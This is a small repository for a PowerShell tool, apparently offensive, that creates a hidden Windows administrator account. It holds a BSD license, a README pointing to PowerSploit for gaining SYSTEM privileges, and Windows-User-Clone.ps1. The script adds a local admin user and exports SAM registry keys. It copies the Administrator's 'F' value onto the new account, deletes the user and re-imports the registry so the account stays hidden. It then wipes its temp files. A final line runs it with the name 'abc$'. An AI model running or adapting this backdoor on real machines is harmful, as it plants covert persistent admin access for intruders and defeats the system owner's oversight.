├── LICENSE
├── README.md
└── Windows-User-Clone.ps1


/LICENSE:
--------------------------------------------------------------------------------
 1 | BSD 3-Clause License
 2 | 
 3 | Copyright (c) 2017, 
 4 | All rights reserved.
 5 | 
 6 | Redistribution and use in source and binary forms, with or without
 7 | modification, are permitted provided that the following conditions are met:
 8 | 
 9 | * Redistributions of source code must retain the above copyright notice, this
10 |   list of conditions and the following disclaimer.
11 | 
12 | * Redistributions in binary form must reproduce the above copyright notice,
13 |   this list of conditions and the following disclaimer in the documentation
14 |   and/or other materials provided with the distribution.
15 | 
16 | * Neither the name of the copyright holder nor the names of its
17 |   contributors may be used to endorse or promote products derived from
18 |   this software without specific prior written permission.
19 | 
20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
30 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Windows-User-Clone
 2 | Create a hidden account
 3 | 
 4 | This script requires System privileges. You can use Invoke-TokenManipulation.ps1 to get System privileges and create the clone user.
 5 | 
 6 | Link: https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-TokenManipulation.ps1
 7 | 
 8 | Author: Evilcg and 3gstuent
 9 | 
10 | Evilcg's way to achieve the same goal:
11 | 
12 | https://github.com/Ridter/Pentest/blob/master/powershell/MyShell/Create-Clone.ps1
13 | 


--------------------------------------------------------------------------------
/Windows-User-Clone.ps1:
--------------------------------------------------------------------------------
  1 | function Create-Clone
  2 | {
  3 | <#
  4 | .SYNOPSIS
  5 | This script requires System privileges. You can use Invoke-TokenManipulation.ps1 to get System privileges and create the clone user.
  6 | Link: https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-TokenManipulation.ps1
  7 | 
  8 | Author: Evilcg and 3gstuent
  9 | Evilcg's way to achieve the same goal:
 10 | https://github.com/Ridter/Pentest/blob/master/powershell/MyShell/Create-Clone.ps1
 11 | 
 12 | .PARAMETER u
 13 | The clone username
 14 | .PARAMETER p
 15 | The clone user's password
 16 | .PARAMETER cu
 17 | The user to be cloned, default administrator 
 18 | .EXAMPLE
 19 | Create-Clone -u abc -p abc123 -cu administrator
 20 | #>
 21 |      Param(
 22 |         [Parameter(Mandatory=$true)]
 23 |         [String]
 24 |         $u,
 25 | 
 26 |         [Parameter(Mandatory=$true)]
 27 |         [String]
 28 |         $p,
 29 | 
 30 |         [Parameter(Mandatory=$false)]
 31 |         [String]
 32 |         $cu = "administrator"
 33 |     )
 34 | 
 35 | 
 36 |     function Create-user ([string]$Username,[string]$Password) 
 37 |     {
 38 |         $group = "Administrators"
 39 |         $adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
 40 |         $existing = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username }
 41 |         if ($existing -eq $null) {
 42 |             Write-Host "Creating new local user $Username with password $Password"
 43 |             & NET USER $Username $Password /add /y /expires:never | Out-Null
 44 |             Write-Host "Adding local user $Username to $group."
 45 |             & NET LOCALGROUP $group $Username /add | Out-Null
 46 |         }
 47 |         else {
 48 |             Write-Host "[*] Setting password for existing local user $Username"
 49 |             $existing.SetPassword($Password)           
 50 |         }
 51 | 
 52 |         Write-Host "[*] Ensuring password for $Username never expires"
 53 |         WMIC USERACCOUNT WHERE "Name='$Username'" SET PasswordExpires=FALSE
 54 |     }
 55 | 
 56 |     function GetUser-Key([string]$user)
 57 |     {
 58 |         cmd /c "regedit /e $env:temp\$user.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\$user""
 59 |         $file = Get-Content "$env:temp\$user.reg"  | Out-String
 60 |         $pattern="@=hex\((.*?)\)\:"
 61 |         $file -match $pattern |Out-Null
 62 |         $key = "00000"+$matches[1]
 63 |         Write-Host $key
 64 |         return $key
 65 |     }
 66 |     
 67 |     function Clone ([string]$ukey,[string]$cukey) 
 68 |     {
 69 |         $ureg = "HKLM:\SAM\SAM\Domains\Account\Users\$ukey" |Out-String
 70 |         $cureg = "HKLM:\SAM\SAM\Domains\Account\Users\$cukey" |Out-String       
 71 |         $cuFreg = Get-Item -Path $cureg.Trim()
 72 |         $cuFvalue = $cuFreg.GetValue('F')
 73 |         Set-ItemProperty -path $ureg.Trim()  -Name "F" -value $cuFvalue
 74 |         $outreg = "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\$ukey"
 75 |         cmd /c "regedit /e $env:temp\out.reg $outreg.Trim()"
 76 |         Write-Host "Copy from $cu to $u success."
 77 |     }
 78 | 
 79 |     function Main () 
 80 |     {
 81 | 
 82 |         Write-Host "[*] Current token: "  -NoNewline
 83 |         $token=whoami
 84 |         if($token -ne "nt authority\system")
 85 |         {
 86 |             Write-Host "  " $token
 87 |             Write-Host "[!] Low privileges."
 88 |             Write-Host "[*] Exit."
 89 |             Exit
 90 |         }
 91 |         else 
 92 |         {
 93 |             Write-Host $token
 94 |         }
 95 | 
 96 |         Write-Host "[*] Create User..."
 97 |         Create-user $u $p
 98 |     
 99 |         Write-Host "[*] Get User $u's Key: "  -NoNewline
100 |         $ukey = GetUser-Key $u |Out-String
101 |     
102 |         Write-Host "[*] Get User $cu's Key: "  -NoNewline
103 |         $cukey = GetUser-Key $cu |Out-String
104 |         
105 |         Write-Host "[*] Try to clone..."
106 |         Clone $ukey $cukey
107 | 
108 |         Write-Host "[*] Delete User:$u"
109 |         Net User $u /del |Out-Null
110 |         
111 |         Write-Host "[*] Import the registry"
112 |         cmd /c "regedit /s $env:temp\$u.reg"
113 |         cmd /c "regedit /s $env:temp\out.reg"
114 |         Write-Host "[*] Clearn"
115 |         Remove-Item $env:temp\*.reg
116 |         Write-Output "[*] All Done."
117 |     }    
118 |     Main   
119 | }
120 | Create-Clone -u abc$ -p 123
121 | 


--------------------------------------------------------------------------------